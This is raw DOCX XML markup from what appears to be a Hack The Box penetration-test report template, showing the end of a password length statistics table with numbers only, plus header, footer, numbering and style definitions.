            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>897</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="000E0FD7" w:rsidRPr="0005451F" w14:paraId="0AC5EC7E"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0886B502" w14:textId="29F25EDA" w:rsidR="000E0FD7" w:rsidRPr="000258FE" w:rsidRDefault="000E0FD7" w:rsidP="00B7507B">
            <w:pPr>
              <w:rPr>
                <w:b/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="833" w:type="pct"/>
          </w:tcPr>
          <w:p w14:paraId="32DAB105" w14:textId="585B80E5" w:rsidR="000E0FD7" w:rsidRPr="000258FE" w:rsidRDefault="000258FE" w:rsidP="004539C5">
            <w:pPr>
              <w:keepNext/>
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000258FE">
              <w:rPr>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>67</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="40FA93D1" w14:textId="0066CD33" w:rsidR="00390B73" w:rsidRDefault="002852E3" w:rsidP="004539C5">
      <w:pPr>
        <w:pStyle w:val="Caption"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Table </w:t>
      </w:r>
      <w:fldSimple w:instr=" SEQ Table \* ARABIC ">
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>10</w:t>
        </w:r>
      </w:fldSimple>
      <w:r>
        <w:t>: Password Length Statistics</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00390B73" w:rsidSect="00EE427A">
      <w:headerReference w:type="default" r:id="rId52"/>
      <w:footerReference w:type="default" r:id="rId53"/>
      <w:footerReference w:type="first" r:id="rId54"/>
      <w:pgSz w:w="12240" w:h="15840"/>
      <w:pgMar w:top="108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2D299" w14:textId="77777777" w:rsidR="00F60579" w:rsidRDefault="00F60579" w:rsidP="003D6D54">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2D72DF0D" w14:textId="77777777" w:rsidR="00F60579" w:rsidRDefault="00F60579" w:rsidP="003D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105110"/>
      <w:docPartObj>
        <w:docPartGallery w:val="Page Numbers (Bottom of Page)"/>
        <w:docPartUnique/>
      </w:docPartObj>
    </w:sdtPr>
    <w:sdtEndPr>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
    </w:sdtEndPr>
    <w:sdtContent>
      <w:p w14:paraId="1ACA25DE" w14:textId="4BB720B7" w:rsidR="004539C5" w:rsidRDefault="004539C5" w:rsidP="004539C5">
        <w:pPr>
          <w:pStyle w:val="Footer"/>
          <w:jc w:val="right"/>
        </w:pPr>
        <w:r>
          <w:fldChar w:fldCharType="begin"/>
        </w:r>
        <w:r>
          <w:instrText xml:space="preserve"> PAGE   \* MERGEFORMAT </w:instrText>
        </w:r>
        <w:r>
          <w:fldChar w:fldCharType="separate"/>
        </w:r>
        <w:r w:rsidR="00713C3F">
          <w:rPr>
            <w:noProof/>
          </w:rPr>
          <w:t>21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D084" w14:textId="68FB2850" w:rsidR="00A40765" w:rsidRDefault="00A40765" w:rsidP="004539C5">
    <w:pPr>
      <w:pStyle w:val="FooterText"/>
    </w:pPr>
    <w:r w:rsidRPr="00042DC8">
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3577E291" wp14:editId="05865AED">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="column">
                <wp:posOffset>95885</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>25400</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="6698512" cy="21265"/>
              <wp:effectExtent l="12700" t="12700" r="20320" b="17145"/>
              <wp:wrapNone/>
              <wp:docPr id="2" name="Straight Connector 2"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvCnPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="6698512" cy="21265"/>
                      </a:xfrm>
                      <a:prstGeom prst="line">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:ln w="19050">
                        <a:solidFill>
                          <a:srgbClr val="A4B1CD"/>
                        </a:solidFill>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4DDE3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2pt" to="5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" strokecolor="#a4b1cd" strokeweight="1.5pt">
              <v:stroke dashstyle="1 1" joinstyle="miter"/>
            </v:line>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>
    </w:r>
  </w:p>
  <w:p w14:paraId="175307D6" w14:textId="77777777" w:rsidR="00A40765" w:rsidRPr="00042DC8" w:rsidRDefault="00A40765" w:rsidP="004539C5">
    <w:pPr>
      <w:pStyle w:val="FooterText"/>
    </w:pPr>
    <w:r w:rsidRPr="00042DC8">
      <w:t>Hack The Box Confidential</w:t>
    </w:r>
  </w:p>
  <w:p w14:paraId="7556E17C" w14:textId="6767012F" w:rsidR="00A40765" w:rsidRPr="00FA3B59" w:rsidRDefault="00A40765" w:rsidP="004539C5">
    <w:pPr>
      <w:pStyle w:val="FooterText"/>
    </w:pPr>
    <w:r w:rsidRPr="00042DC8">
      <w:rPr>
        <w:sz w:val="16"/>
        <w:szCs w:val="16"/>
      </w:rPr>
      <w:t>No part of this document may be disclosed to outside sources without the explicit written authorization of Hack The Box.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2419A" w14:textId="77777777" w:rsidR="00F60579" w:rsidRDefault="00F60579" w:rsidP="003D6D54">
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="19402B86" w14:textId="77777777" w:rsidR="00F60579" w:rsidRDefault="00F60579" w:rsidP="003D6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56296" w14:textId="2F83F86B" w:rsidR="00A40765" w:rsidRPr="00BB0A08" w:rsidRDefault="00A40765">
    <w:pPr>
      <w:pStyle w:val="Header"/>
      <w:rPr>
        <w:vertAlign w:val="subscript"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <w:drawing>
        <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C801B49" wp14:editId="78EFED37">
          <wp:extent cx="1643974" cy="321089"/>
          <wp:effectExtent l="0" t="0" r="0" b="0"/>
          <wp:docPr id="16" name="Picture 1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871800" cy="365586"/>
                  </a:xfrm>
                  <a:prstGeom prst="rect">
                    <a:avLst/>
                  </a:prstGeom>
                </pic:spPr>
              </pic:pic>
            </a:graphicData>
          </a:graphic>
        </wp:inline>
      </w:drawing>
    </w:r>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251662336" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2656A31F" wp14:editId="54FEE0A1">
              <wp:simplePos x="0" y="0"/>
              <wp:positionH relativeFrom="page">
                <wp:align>left</wp:align>
              </wp:positionH>
              <wp:positionV relativeFrom="paragraph">
                <wp:posOffset>467522</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="7782708" cy="0"/>
              <wp:effectExtent l="0" t="0" r="2540" b="12700"/>
              <wp:wrapNone/>
              <wp:docPr id="5" name="Straight Connector 5"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvCnPr/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="7782708" cy="0"/>
                      </a:xfrm>
                      <a:prstGeom prst="line">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:ln w="12700" cap="rnd">
                        <a:solidFill>
                          <a:srgbClr val="A4B1CD"/>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BA94D7" id="Straight Connector 5"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6.8pt" to="612.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" strokecolor="#a4b1cd" strokeweight="1pt">
              <v:stroke dashstyle="1 1" joinstyle="miter" endcap="round"/>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F32"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3852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00246"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="D49C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31986"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F90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F7BCA"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="C410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25749"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="381E5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40D92"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F926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B0A66"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="A4AA8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4A695E"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="EDFA1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28520039"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8D6AAF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E72F38"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6B2E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14CC9"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DFB0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200CE"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F7E6DFF0"/>
    <w:lvl w:ilvl="0" w:tplc="944C9D5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4B5229"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="90D847D2"/>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A706F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="6222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B21015"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="0402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5B1898"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5A2007F8"/>
    <w:lvl w:ilvl="0" w:tplc="8CFC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25377"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="57DE4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1C4F19"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="4E8C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521F65"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="5238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37381B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="DDA0F2C4"/>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677E3F"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="91FE5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8F4D77"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="581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C6773"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="CF70861E"/>
    <w:lvl w:ilvl="0" w:tplc="87D210F0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:pStyle w:val="Finding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4"/>
  </w:num>
  <w:num w:numId="4">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="5">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="6">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="9">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="10">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="11">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="12">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="13">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="14">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="15">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="16">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="17">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="18">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="19">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="20">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="21">
    <w:abstractNumId w:val="19"/>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54"/>
    <w:rsid w:val="0000244D"/>
    <w:rsid w:val="00002D1A"/>
    <w:rsid w:val="00010F23"/>
    <w:rsid w:val="0001530A"/>
    <w:rsid w:val="000258FE"/>
    <w:rsid w:val="00031E87"/>
    <w:rsid w:val="00042DC8"/>
    <w:rsid w:val="00045380"/>
    <w:rsid w:val="0005031A"/>
    <w:rsid w:val="0005451F"/>
    <w:rsid w:val="00091299"/>
    <w:rsid w:val="000C6D37"/>
    <w:rsid w:val="000E0FD7"/>
    <w:rsid w:val="000E6FF6"/>
    <w:rsid w:val="00102F8A"/>
    <w:rsid w:val="0011205E"/>
    <w:rsid w:val="00133953"/>
    <w:rsid w:val="00183CDE"/>
    <w:rsid w:val="0019464F"/>
    <w:rsid w:val="001C6D4A"/>
    <w:rsid w:val="001E1051"/>
    <w:rsid w:val="001E3329"/>
    <w:rsid w:val="00202C61"/>
    <w:rsid w:val="002163A5"/>
    <w:rsid w:val="00216BB8"/>
    <w:rsid w:val="00221FB6"/>
    <w:rsid w:val="00234588"/>
    <w:rsid w:val="00253BCB"/>
    <w:rsid w:val="002801BC"/>
    <w:rsid w:val="002829EF"/>
    <w:rsid w:val="002852E3"/>
    <w:rsid w:val="002B240C"/>
    <w:rsid w:val="002B7E55"/>
    <w:rsid w:val="002C1820"/>
    <w:rsid w:val="002F11DB"/>
    <w:rsid w:val="00302E45"/>
    <w:rsid w:val="00302F21"/>
    <w:rsid w:val="00304717"/>
    <w:rsid w:val="00305619"/>
    <w:rsid w:val="003260D5"/>
    <w:rsid w:val="00342ADF"/>
    <w:rsid w:val="00351832"/>
    <w:rsid w:val="0035464E"/>
    <w:rsid w:val="0036389D"/>
    <w:rsid w:val="00371644"/>
    <w:rsid w:val="00374E66"/>
    <w:rsid w:val="00375482"/>
    <w:rsid w:val="00390B73"/>
    <w:rsid w:val="00393946"/>
    <w:rsid w:val="003A6F42"/>
    <w:rsid w:val="003A7C6E"/>
    <w:rsid w:val="003D5536"/>
    <w:rsid w:val="003D6D54"/>
    <w:rsid w:val="003E0D0B"/>
    <w:rsid w:val="00402C9B"/>
    <w:rsid w:val="00411940"/>
    <w:rsid w:val="0042398C"/>
    <w:rsid w:val="00441309"/>
    <w:rsid w:val="00442CC7"/>
    <w:rsid w:val="0045385A"/>
    <w:rsid w:val="004539C5"/>
    <w:rsid w:val="004550AA"/>
    <w:rsid w:val="00465543"/>
    <w:rsid w:val="00480C45"/>
    <w:rsid w:val="0049567A"/>
    <w:rsid w:val="004B0583"/>
    <w:rsid w:val="004C55CB"/>
    <w:rsid w:val="004E4CF5"/>
    <w:rsid w:val="00520B63"/>
    <w:rsid w:val="005245E6"/>
    <w:rsid w:val="005246AF"/>
    <w:rsid w:val="00525CDA"/>
    <w:rsid w:val="005345C1"/>
    <w:rsid w:val="00544EFF"/>
    <w:rsid w:val="005606C3"/>
    <w:rsid w:val="005611E9"/>
    <w:rsid w:val="0058681A"/>
    <w:rsid w:val="005A0A2B"/>
    <w:rsid w:val="005A485A"/>
    <w:rsid w:val="005B3C4F"/>
    <w:rsid w:val="005D392C"/>
    <w:rsid w:val="005D3DDE"/>
    <w:rsid w:val="005E0596"/>
    <w:rsid w:val="005F0226"/>
    <w:rsid w:val="005F4B15"/>
    <w:rsid w:val="00602E00"/>
    <w:rsid w:val="006215F2"/>
    <w:rsid w:val="006372B6"/>
    <w:rsid w:val="00643386"/>
    <w:rsid w:val="006434C2"/>
    <w:rsid w:val="00655232"/>
    <w:rsid w:val="00674E67"/>
    <w:rsid w:val="00686A23"/>
    <w:rsid w:val="006B257A"/>
    <w:rsid w:val="006D42BF"/>
    <w:rsid w:val="006D44C1"/>
    <w:rsid w:val="006E291D"/>
    <w:rsid w:val="006E787B"/>
    <w:rsid w:val="00704565"/>
    <w:rsid w:val="007046B0"/>
    <w:rsid w:val="00706631"/>
    <w:rsid w:val="00713C3F"/>
    <w:rsid w:val="007179EE"/>
    <w:rsid w:val="00720548"/>
    <w:rsid w:val="007316CB"/>
    <w:rsid w:val="00733288"/>
    <w:rsid w:val="007369DF"/>
    <w:rsid w:val="00742DDF"/>
    <w:rsid w:val="00746443"/>
    <w:rsid w:val="007535A7"/>
    <w:rsid w:val="0076648F"/>
    <w:rsid w:val="00791AC0"/>
    <w:rsid w:val="0079201F"/>
    <w:rsid w:val="007B0529"/>
    <w:rsid w:val="007C41EB"/>
    <w:rsid w:val="007D1F5C"/>
    <w:rsid w:val="007F44E9"/>
    <w:rsid w:val="008166EC"/>
    <w:rsid w:val="008232E7"/>
    <w:rsid w:val="008241F8"/>
    <w:rsid w:val="00857E7B"/>
    <w:rsid w:val="00867685"/>
    <w:rsid w:val="00881DF1"/>
    <w:rsid w:val="008B2877"/>
    <w:rsid w:val="008B56FE"/>
    <w:rsid w:val="009066B1"/>
    <w:rsid w:val="00916765"/>
    <w:rsid w:val="00934A22"/>
    <w:rsid w:val="00935704"/>
    <w:rsid w:val="00935ECE"/>
    <w:rsid w:val="009418BF"/>
    <w:rsid w:val="009461AF"/>
    <w:rsid w:val="00973040"/>
    <w:rsid w:val="009830DD"/>
    <w:rsid w:val="00991399"/>
    <w:rsid w:val="009B6062"/>
    <w:rsid w:val="009C4180"/>
    <w:rsid w:val="009C4CC4"/>
    <w:rsid w:val="009F119A"/>
    <w:rsid w:val="00A40765"/>
    <w:rsid w:val="00A4560A"/>
    <w:rsid w:val="00A85451"/>
    <w:rsid w:val="00A85D5C"/>
    <w:rsid w:val="00AB2409"/>
    <w:rsid w:val="00AB5E0D"/>
    <w:rsid w:val="00AB7E0E"/>
    <w:rsid w:val="00AC5FB2"/>
    <w:rsid w:val="00AE15DA"/>
    <w:rsid w:val="00AE241B"/>
    <w:rsid w:val="00AE6B03"/>
    <w:rsid w:val="00AF1255"/>
    <w:rsid w:val="00AF5E0D"/>
    <w:rsid w:val="00B37CAB"/>
    <w:rsid w:val="00B63561"/>
    <w:rsid w:val="00B7507B"/>
    <w:rsid w:val="00B75D2B"/>
    <w:rsid w:val="00B807BB"/>
    <w:rsid w:val="00B8375E"/>
    <w:rsid w:val="00B87416"/>
    <w:rsid w:val="00BB0A08"/>
    <w:rsid w:val="00BB5F20"/>
    <w:rsid w:val="00BC21AF"/>
    <w:rsid w:val="00BC2D06"/>
    <w:rsid w:val="00BF25A8"/>
    <w:rsid w:val="00C14145"/>
    <w:rsid w:val="00C23F85"/>
    <w:rsid w:val="00C32C65"/>
    <w:rsid w:val="00C332E5"/>
    <w:rsid w:val="00C53C23"/>
    <w:rsid w:val="00C55BC0"/>
    <w:rsid w:val="00C64082"/>
    <w:rsid w:val="00C82776"/>
    <w:rsid w:val="00CA09DC"/>
    <w:rsid w:val="00CA74E4"/>
    <w:rsid w:val="00CC217A"/>
    <w:rsid w:val="00CC3B1E"/>
    <w:rsid w:val="00CD184F"/>
    <w:rsid w:val="00CF69E1"/>
    <w:rsid w:val="00CF7345"/>
    <w:rsid w:val="00D075D5"/>
    <w:rsid w:val="00D111FD"/>
    <w:rsid w:val="00D14781"/>
    <w:rsid w:val="00D15A17"/>
    <w:rsid w:val="00D71552"/>
    <w:rsid w:val="00D742D2"/>
    <w:rsid w:val="00D77A2A"/>
    <w:rsid w:val="00D83A2C"/>
    <w:rsid w:val="00D860BB"/>
    <w:rsid w:val="00D91C7B"/>
    <w:rsid w:val="00D91E64"/>
    <w:rsid w:val="00DA6F73"/>
    <w:rsid w:val="00DB264C"/>
    <w:rsid w:val="00DC296F"/>
    <w:rsid w:val="00DC2B7D"/>
    <w:rsid w:val="00DC2E0C"/>
    <w:rsid w:val="00DC3356"/>
    <w:rsid w:val="00DC5A70"/>
    <w:rsid w:val="00DD5184"/>
    <w:rsid w:val="00DE35E7"/>
    <w:rsid w:val="00DF5B46"/>
    <w:rsid w:val="00E31EDE"/>
    <w:rsid w:val="00E54D62"/>
    <w:rsid w:val="00E5694A"/>
    <w:rsid w:val="00E72CE9"/>
    <w:rsid w:val="00E81003"/>
    <w:rsid w:val="00ED3554"/>
    <w:rsid w:val="00EE427A"/>
    <w:rsid w:val="00EE48D9"/>
    <w:rsid w:val="00F16DD0"/>
    <w:rsid w:val="00F37EF9"/>
    <w:rsid w:val="00F4100D"/>
    <w:rsid w:val="00F43CFC"/>
    <w:rsid w:val="00F43E55"/>
    <w:rsid w:val="00F60579"/>
    <w:rsid w:val="00F648D2"/>
    <w:rsid w:val="00F75CFC"/>
    <w:rsid w:val="00F93B55"/>
    <w:rsid w:val="00F94A04"/>
    <w:rsid w:val="00F97305"/>
    <w:rsid w:val="00FA3B59"/>
    <w:rsid w:val="00FA7BF9"/>
    <w:rsid w:val="00FA7CD1"/>
    <w:rsid w:val="00FB4062"/>
    <w:rsid w:val="00FD16E9"/>
    <w:rsid w:val="00FE3E30"/>
    <w:rsid w:val="00FF2AF8"/>
    <w:rsid w:val="00FF5978"/>
    <w:rsid w:val="140D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9DEF"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{B0520317-D759-4385-A220-02206AE7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94A"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:spacing w:after="120" w:line="240" w:lineRule="auto"/>
      <w:jc w:val="both"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:aliases w:val="HTB Heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="0005031A"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:before="120" w:after="240"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="9FEF00"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00520B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0B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3D6D54"/>
    <w:pPr>
      <w:widowControl/>
      <w:pBdr>
        <w:bottom w:val="single" w:sz="8" w:space="4" w:color="4F81BD"/>
      </w:pBdr>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>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3D6D54"/>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3D6D54"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="HeaderChar">
    <w:name w:val="Header Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Header"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003D6D54"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="003D6D54"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="003D6D54"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="39"/>
    <w:rsid w:val="002163A5"/>
    <w:pPr>
      <w:spacing w:before="120" w:after="120" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
    <w:tblPr>
      <w:tblStyleRowBandSize w:val="1"/>
      <w:tblInd w:w="0" w:type="dxa"/>
      <w:tblCellMar>
        <w:top w:w="0" w:type="dxa"/>
        <w:left w:w="108" w:type="dxa"/>
        <w:bottom w:w="0" w:type="dxa"/>
        <w:right w:w="108" w:type="dxa"/>
      </w:tblCellMar>
    </w:tblPr>
    <w:trPr>
      <w:cantSplit/>
    </w:trPr>
    <w:tcPr>
      <w:vAlign w:val="center"/>
    </w:tcPr>
    <w:tblStylePr w:type="firstRow">
      <w:rPr>
        <w:b/>
      </w:rPr>
      <w:tblPr/>
      <w:trPr>
        <w:tblHeader/>
      </w:trPr>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="9FEF00"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band1Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="A4B1CD"/>
      </w:tcPr>
    </w:tblStylePr>
    <w:tblStylePr w:type="band2Horz">
      <w:tblPr/>
      <w:tcPr>
        <w:shd w:val="clear" w:color="auto" w:fill="BFC8DC"/>
      </w:tcPr>
    </w:tblStylePr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00351832"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="GridTable5Dark-Accent6">
    <w:name w:val="Grid Table 5 Dark Accent 6"/>
    <w:basedOn w:val="TableNormal"/>
    <w:uiPriority w:val="50"/>
    <w:rsid w:val="003518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5183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5183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aliases w:val="HTB Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="0005031A"/>
    <w:rPr>
      <w:rFonts w:eastAsiaTheme="majorEastAsia" w:cstheme="majorBidi"/>
      <w:b/>
      <w:color w:val="9FEF00"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="HTBheading2">
    <w:name w:val="HTB heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HTBheading2Char"/>
    <w:qFormat/>
    <w:rsid w:val="00C55BC0"/>
    <w:pPr>
      <w:spacing w:before="120"/>
      <w:contextualSpacing/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:color w:val="9FEF00"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:customStyle="1" w:styleId="TableGrid1">
    <w:name w:val="Table Grid1"/>
    <w:basedOn w:val="TableNormal"/>
    <w:next w:val="TableGrid"/>
    <w:rsid w:val="00704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Bheading2Char">
    <w:name w:val="HTB heading 2 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="HTBheading2"/>
    <w:rsid w:val="00C55BC0"/>
    <w:rPr>
      <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
      <w:b/>
      <w:color w:val="9FEF00"/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListParagraph">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="00704565"/>
    <w:pPr>
      <w:ind w:left="720"/>
      <w:contextualSpacing/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOCHeading">
    <w:name w:val="TOC Heading"/>
    <w:basedOn w:val="Heading1"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="004539C5"/>
    <w:pPr>
      <w:widowControl/>
      <w:autoSpaceDE/>
      <w:autoSpaceDN/>
      <w:spacing w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
